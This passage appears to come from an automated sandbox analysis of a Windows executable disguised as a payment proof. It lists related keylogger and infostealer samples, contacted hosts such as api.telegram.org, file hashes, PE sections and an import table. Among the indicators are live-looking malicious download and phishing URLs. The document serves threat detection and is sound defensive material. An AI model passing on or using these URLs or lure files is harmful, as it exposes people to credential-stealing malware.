	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
api.telegram.org	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Solicitud de cotizacion Stro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
TELEGRAMRU	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
CLOUDFLARENETUS	https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.com	Get hash	malicious	Phisher	Browse	104.16.123.96
	https://acrobatsign.us.com/D5QtQ3EphanI1AQ3Ez01thoTxmaD5Q2AP4DCaI1AI1AchI1A-D5QankyoTxz01Q3Eu	Get hash	malicious	Unknown	Browse	172.67.189.14
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	172.66.0.227
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	87654785457596574686FKHN-Copy.pdf	Get hash	malicious	Phisher	Browse	104.22.72.81
	https://uymtnxoiutrbebdxcfngvhbjnklijuygtfbrdxevfcgvhbjn.b-cdn.net/updatinggeneral004/index.html?b=Y3VzdG9tZXJzZXJ2aWNldGVhbUB3YWl0cm9zZS5jby51aw==	Get hash	malicious	Unknown	Browse	104.22.20.144
	https://uymtnxoiutrbebdxcfngvhbjnklijuygtfbrdxevfcgvhbjn.b-cdn.net/updatinggeneral004/index.html?b=Y3VzdG9tZXJzZXJ2aWNldGVhbUB3YWl0cm9zZS5jby51aw==	Get hash	malicious	Unknown	Browse	172.67.41.16
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	Order88983273293729387293828PDF.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==	Get hash	malicious	Unknown	Browse	149.154.167.220
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	phish_alert_sp1_1.0.0.0(1).eml	Get hash	malicious	KnowBe4	Browse	149.154.167.220
	voi.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	http://dailyfragrancedeals.com	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\z30ProofofPaymentAttached.exe
File Type:	data
Category:	dropped
Size (bytes):	144504
Entropy (8bit):	7.952850631769685
Encrypted:	false
SSDEEP:	3072:iQ11th1R7v+TJv05+mzGv0AGY4WsZWQfSw6z3dea2PeAh:iQDth1Rj+TJOGv10MTdea2WAh
MD5:	22782BBE7ECEBE2CD7F1301E072787BB
SHA1:	3AA34F5D03A0DFE2C79AC2C6E30AB520C976CE5E
SHA-256:	4E960A11F5E2268AB4591AB4B0E2743EC4FBCA07AC7FDAF165E761A4A12EDD7F
SHA-512:	996C9844D4E4F0940BF469FAA1CA1BA04A8FC671CA049D1636ABC0F0ED5FF300C50F4692922D3FC40722BC717A762BA0C05A9B5F4BC1BAD3B6F5C95BB7AB6B90
Malicious:	false
Reputation:	low
Preview:	EA06..F..[...]F.8.M&..W..N.S'3jeZ.9..+T..rd..Mg5Ju.._3P..u.....X.cg............3$.Ket..../.V..Y..c].Q...Bun.@.Qi..Q\..j.+...m1.u..8..1..ML.s]...q_....5".L..9.-}.L&.P..EH.."...T.\..\`....P..^.Tj ....!.zd.ML.W....F.(.....?..=V.o..j..f....nj..p....)....35.T...F.S'7....(.ZE....X.je..\..\p..@..V.(......@..K.9. .)...9....2...L..j.B.D..v.@..B.O@(~...aw....wp.,G.....V.e&..7..S.......n..8.....D.P....rG....c7.T).. .v......\......R&..U..K`.qL.E)`....p....@..,..V......2.E)....B..g...Fa5..,...nmL.s'.Z.zwr..'.I..k=..T..V.Oh.Z."..L..J.NsT.p.3.."......uF.#..f......3j...9..,...fq..L&\|.eJ.B....2`..X...,.i6.]..I..s6.u...R.V...)..5.....DJmf.L.....y.S'3...%T.W)..2.H....JEF...G.T...J.."r.wZ.....9..a..G.r....=../..<..Z.^.q(.F.._..u.D..D.......G...e...R..=K.....sfw.."G....:..sT.Z....%..j....F.M&.I.[IN.Q....Ze~.E&.....s$...2...U..:=..H......ct..P..y.:....kU.UJ]a.Y&S.$8.(..).I.....yjs..Je...*.J..O4.[).....;....J...~.P..y.z.L...ry.F.<.L).)..d.S'\|....9..3^..Q6.r...L...

C:\Users\user\AppData\Local\Temp\murky

Download File

Process:	C:\Users\user\Desktop\z30ProofofPaymentAttached.exe
File Type:	data
Category:	modified
Size (bytes):	280064
Entropy (8bit):	6.955326163403382
Encrypted:	false
SSDEEP:	6144:TucClIHy9liBfp2I0MqroUTNtorr+txuRqRcO86xSxM5xvnx+4xTihH4C9df8wmZ:TFtqroUTNtorr+txuR4cO808MrvnxhTr
MD5:	A5CB4D1A5E868E43B4E2A491F5B9C9A8
SHA1:	B17BEBFEC6EE41C116EA6CCF69A0E833DD0D8F2C
SHA-256:	AE7E8D1F90FDFED0910F7FCB2B05C8A02643C0B1E61CA5515A0DC19DC4186ECF
SHA-512:	AB06F938762E7DF88FD59B137765D77DE5AD72CCA42EE16D27CDEFEA34771FA63D539219DF363CE1122B9C4F94FE2D185DB9EC231CFC93D20EF3DC8EB82C6277
Malicious:	false
Reputation:	low
Preview:	to.ZKQS86400..TN.L96LVL9uPZHQS8240059TNBL96LVL95PZHQS8240059.NBL7).XL.<.{.P...`XYF.$<-+KW!v/X[>5<q1].FE^.P:n..j.!9(\.]WBuS824005i.NB.85L..SPZHQS824.078_O.L9.HVL-5PZHQS.}000.9TN"H96L.L9.PZHSS8640059TNFL96LVL95.^HQQ824005;T..L9&LV\95PZXQS(240059DNBL96LVL95P..USo2400U=TYRL96LVL95PZHQS824005.PNNL96LVL95PZHQS8240059TNBL96LVL95PZHQS8240059TNBL96LVL.5PRHQS8240059TFbL9~LVL95PZHQS8.@UHA9TN.c=6LvL95`^HQQ8240059TNBL96LvL9U~(;#0824' 59T.FL9$LVL.1PZHQS8240059T.BLy.>3 VVPZDQS82.405;TNB.=6LVL95PZHQS82t00w9TNBL96LVL95PZHQ.w640059.NBL;6IV..7P&.PS;240.59Rn.N9.LVL95PZHQS8240059TNBL96LVL95PZHQS8240059TNB.D.C...\#..QS824017:PHJD96LVL95P$HQS~240p59TyBL9.LVLT5PZlQS8L400K9TN&L96>VL9TPZH.S82[005WTNB296LHN..PZB{u80..053Td.?.6L\.85P^;rS88.205='jBL3.OVL=FuZH[.<244C.9TD.I96H\|.96.LNQS#].00?9W.WJ96W\|j97x`HQY8..03.,RNBW..LT.05P^b. %246.v9TD6E96N.F95TpVS{\|24:..G_NBH.6ft255P^cQy.L9001.Td\N.;LVH...THQW.2..N:9TJiL.(N.C95Tpj/C820.0..*_BL=.L\|nG'PZLzS..J#05=.NhnG"LVH.5zx6DS86.0..GBNBH.6ft2.5P^cQy.L,001.Td\N..LVH.3z8H#.-2D3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.96748319435055
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	z30ProofofPaymentAttached.exe
File size:	1'073'152 bytes
MD5:	a2c61107b1d0bd03a8133c81b02fe6d8
SHA1:	b27273c26424a5ab644440485196b506ed5e4ee7
SHA256:	f0e637afd17905703f31d1efa7b5c847687560311ecec72b7f84352b4e3c66fc
SHA512:	02dafffd91ebf5860535f1cd3d815a93bb2953d77e1e0d4f4507867f91dbde60bf993982f201de5b7e586bf94a50a7c466ee07dfa8cc3ae4305c921c3f41009d
SSDEEP:	24576:rtb20pkaCqT5TBWgNQ7aU3pfLv+GTnn25/6A:oVg5tQ7aU3Fpn2x5
TLSH:	9335CF1373DD8361C3B25273BA65B701AEBF782506A5F96B2FD8093DE820122525E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673B2171 [Mon Nov 18 11:13:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F90388ADC1Fh
jmp 00007F90388A0C34h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F90388A0DBAh
cmp edi, eax
jc 00007F90388A111Eh
bt dword ptr [004C0158h], 01h
jnc 00007F90388A0DB9h
rep movsb
jmp 00007F90388A10CCh
cmp ecx, 00000080h
jc 00007F90388A0F84h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F90388A0DC0h
bt dword ptr [004BA370h], 01h
jc 00007F90388A1290h
bt dword ptr [004C0158h], 00000000h
jnc 00007F90388A0F5Dh
test edi, 00000003h
jne 00007F90388A0F6Eh
test esi, 00000003h
jne 00007F90388A0F4Dh
bt edi, 02h
jnc 00007F90388A0DBFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F90388A0DC3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F90388A0E15h
bt esi, 03h
jnc 00007F90388A0E68h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x3cfb0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x101000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x3cfb0	0x3d000	28e10cb83038c6dbac1c1e3e5be55a1e	False	0.8928302702356558	data	7.808400174698691	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x101000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x342b5	data			1.0003556637106021
RT_GROUP_ICON	0x100a70	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x100ae8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x100afc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x100b10	0x14	data	English	Great Britain	1.25
RT_VERSION	0x100b24	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x100c00	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, 